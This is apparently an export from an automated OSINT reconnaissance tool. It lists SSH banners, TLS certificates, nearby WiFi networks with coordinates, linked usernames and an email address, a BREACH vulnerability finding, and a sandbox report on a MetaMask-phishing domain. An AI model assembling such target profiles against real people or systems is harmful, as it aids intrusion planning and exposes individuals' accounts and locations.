"dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", 
"www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", 
"ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan11 (Net ID: 00:02:6F:04:8F:04) | 37.7642, -122.3993 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcalendars.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | giters (Category: coding)
https://giters.com/Altpapier | Altpapier |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NETGEAR (Net ID: 00:09:5B:6A:9E:4C) | 39.0469, -77.4903 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-oo2.github.io | 185.199.111.153 |
| 2023-05-12 03:14:48 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | www.ayhu.xyz |
| 2023-05-12 03:09:03 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.105 | 87.248.157.102 |
| 2023-05-12 02:45:07 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8001::153 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00tau.github.io]
https://www.openphish.com/feed.txt | 00tau.github.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | codementor (Category: coding)
https://www.codementor.io/@login | login |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/patrickpogoda/ | patrickpogoda |
| 2023-05-12 02:53:10 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | None None | vscode.battleb0t.xyz |
| 2023-05-12 02:59:53 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | banksean@gmail.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://g.width/386,g.getcontext(m', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://maskwallets.xyz/forms/v2.js', u'type': u'visited', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://maskwallets.xyz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3252"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cb4_IESQMMUTEX_0_519"\n "IsoScope_cb4_ConnHashTable<3252>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cb4_IESQMMUTEX_0_303"\n "IsoScope_cb4_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_cb4_IE_EarlyTabStart_0xb2c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_519"\n 
"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.125:80"\n "172.217.164.106:443"\n "142.251.46.234:80"\n "142.250.189.163:80"\n "43.251.41.15:443"\n "104.17.211.243:443"\n "142.251.214.132:443"\n "142.251.32.35:443"\n "104.17.212.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "142.250.189.163:443"\n "185.199.110.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"maskwallets.xyz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: maskwallets.xyz\nDNT: 1\nConnection: Keep-Alive\nCookie: _ga=GA1.2.1689897167.1682546284; _gid=GA1.2.304489594.1682546284; _gat_gtag_UA_37075177_6=1; LPVID=EwOTcwNTgwYTNiMjZiNTE2; LPSID-88982875=upHQCJz-TiCz5i-z2-4hWg"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', 
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "maskwallets.xyz"\n "metamask.io"\n "perf.hsforms.com"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_1_.js")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string 
".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': 
u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 300x300 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type "Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, 
u'threat_level': 0, u'type': 8, u'description': u'"Cab4009.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab4009.tmp]- [targetUID: 00000000-00003016]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 dat |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER1 (Net ID: 00:02:6F:B3:3B:A8) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5d0de95ea502c0-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/battleb0t | battleb0t |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | ondigitalocean.com |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
15:ef:a6:fd:ef:21:53:78:53:f6:e6:7d:e0:a9:be:9a:f4:2a:
f3:6b:f8:45:b0:1e:92:39:ea:7f:20:4e:9d:7e:15:34:36:61:
5c:46:2f:03:80:59:84:da:ef:66:78:da:e7:b0:f0:dc:e6:6a:
c6:b2:06:d7:47:db:11:48:d1:1f:c9:fd:2b:78:20:9d:86:11:
3b:e4:51:10:b8:54:d7:6e:6f:db:ce:56:14:fa:f5:79:05:a8:
02:0b:cb:0a:18:31:3a:e9:dd:4b:c7:d7:53:e4:2f:bc:37:98:
11:c7:a5:55:7f:64:7e:ee:5a:1d:86:0e:38:0c:bd:8e:2a:bd:
3e:16:9b:63:5f:9f:06:9d:58:f3:3d:71:94:e6:c1:49:68:5e:
41:22:f6:d4:2e:f7:b9:62:b8:3b:2f:c1:c6:66:8c:a7:82:e0:
40:ef:66:13:cd:53:80:bc:ca:bc:49:c0:67:81:c8:1d:d8:f5:
37:5a:da:e3:56:36:cd:fd:cb:00:ce:97:33:4d:b7:29:cd:90:
4e:43:37:62:d7:92:39:fa:36:a2:59:0a:4f:35:fa:8e:5a:01:
